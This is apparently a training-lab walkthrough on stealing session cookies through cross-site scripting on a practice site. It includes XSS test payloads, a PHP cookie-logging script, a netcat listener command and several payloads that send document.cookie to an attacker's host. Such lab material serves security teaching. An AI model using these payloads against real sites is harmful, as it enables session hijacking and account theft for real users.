XSS vulnerabilities allow attackers to execute arbitrary JavaScript in a victim’s browser. For XSS to result in session cookie leakage:
- Session cookies must be carried in all HTTP requests
- HTTPOnly attribute must be missing (cookies accessible by JavaScript)
XSS Payload Testing
Login: crazygorilla983 / pisces at http://xss.htb.net
Test payloads in profile fields:
"><img src=x onerror=prompt(document.domain)>
"><img src=x onerror=confirm(1)>
"><img src=x onerror=alert(1)>After saving, check the “Share” functionality. The Country field payload fires when viewing the public profile. HTTPOnly is off (verified via Developer Tools).
Cookie Stealing with PHP Logging Script
log.php:
<?php
$logFile = "cookieLog.txt";
$cookie = $_REQUEST["c"];
$handle = fopen($logFile, "a");
fwrite($handle, $cookie . "\\n\\n");
fclose($handle);
header("Location: <http://www.google.com/>");
exit;
?>Start PHP server:
php -S <VPN/TUN Adapter IP>:8000Payload for Country field:
<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://<VPN/TUN Adapter IP>:8000/log.php?c=' + document.cookie;"></video>Victim simulates:
- Login as smallfrog576 / guitars
- Visit http://xss.htb.net/profile?email=ela.stienen@example.com
The cookie appears in PHP server logs and is saved to cookieLog.txt.
Cookie Stealing with Netcat
Payload:
<h1 onmouseover='document.write(`<img src="http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}">`)'>test</h1>Start Netcat listener:
nc -nlvp 8000When victim hovers over “test,” Netcat receives base64-encoded cookie. Decode with:
atob("base64_string")Stealthier Fetch Payload (No Redirect)
<script>fetch(`http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}`)</script>